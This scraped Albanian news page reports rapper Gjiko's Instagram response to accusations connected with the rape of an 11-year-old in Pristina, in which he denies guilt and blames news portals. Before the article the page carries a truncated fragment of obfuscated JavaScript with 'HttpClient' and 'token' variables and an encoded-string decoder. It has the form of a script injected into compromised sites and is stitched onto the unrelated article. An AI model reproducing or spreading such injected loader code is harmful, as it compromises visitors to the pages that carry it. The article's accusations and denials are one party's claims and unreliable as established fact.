;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Ma shqetësuan e ma tmerruan familjen’, Gjiko reagon pas akuzave me gisht ndaj tij!

By

Reperi Gjiko ka bërë një reagim të ri mbi veten dhe ngjarjen e tmerrshme të përdhunimit të 11 vjeçares në Prishtinë.

Ai ka zgjedhur Instagramin për t’iu përgjigjur pikëpyetjeve.

View this post on Instagram

A post shared by GJ I K O (@gjikotheflyboy)

“Ju që po na gjykoni neve si artistë për influencë të keqe a po e dini që fëmijët tuaj nëpër shtëpitë e juaja kanë qasje nëpër faqe pornografike 99% dhe nuk keni asnjë pikë kontrolli çka fëmijët tuaj bëjnë nëpër telefona e tableta. Edhe mos mendoni që na dëgjojnë vetëm neve artistëve shqiptarë por edhe artistët internacional. Sa i përket degjenerimit global, na jemi vrima e fundit e kavallit. Edhe mos harroni, ne bëjmë muzikë për të rritur e jo për fëmijë”, është shprehur ai mes tjerash.

Tutje, reperi ka folur edhe për akuzat ndaj tij që u riaktualizuan së fundmi

“e sa më përket mua, më paskan përgojuar emrin prapë. Nuk ka dert. Më nuk foli për këtë rast por pres me fol gjykata. Krejt ju që po më paragjykoni, po më thuani pedofil, dhunues etj. Asnjëri nuk keni faj. Faj kanë ato portale që e kanë me mua personalisht. E fakturën ata kanë me e la me ligj. E kam cekur edhe një herë që nuk e kam dhunuar e as droguar askënd e aq ma pak një të mitur. Një burrë i vërtetë flet një herë edhe nuk ka nevojë me rrejt. Për mu si me rrejt si me dhunu, e njëjta marre është. Falemnderoj krejt ata që nuk janë duke më paragjykuar dhe po më mbështesin cdo ditë. Drejtësia ka me fol”, deklaron ai.

Gjiko reagimin e tij e ka përmbyllur duke u shprehur:

“E vetmja arsye pse s’akm reaguar deri tash është sepse kam pasur frikë prej disa portaleve me ju jep material dhe ata me e shtrembëru titullin edhe me perfitu prej meje duke shpërndarë propaganda. S’kam dashur familjes sime t’i jap stres dhe ankth. Por ata ia arritën prapë, ma shqetësuan e ma tmerruan familjen me lajme fake, por qysh thotë populli, sabri e ka selametin”.

Artikuj të ngjashëm